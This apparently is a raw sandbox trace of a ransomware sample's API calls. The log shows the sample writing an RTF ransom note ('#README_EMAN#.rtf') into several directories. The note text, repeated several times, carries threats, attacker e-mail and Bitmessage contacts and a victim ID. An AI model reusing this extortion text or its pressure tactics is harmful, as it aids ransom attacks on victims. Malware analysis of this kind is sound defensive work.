Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.078] WriteFile (in: hFile=0x2c8, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.079] CloseHandle (hObject=0x2c8) returned 1 [0269.079] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_17.012.20098\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_17.012.20098\\#readme_eman#.rtf")) returned 0x20 [0269.079] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\#readme_eman#.rtf")) returned 0xffffffff [0269.079] GetLastError () returned 0x2 [0269.079] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your 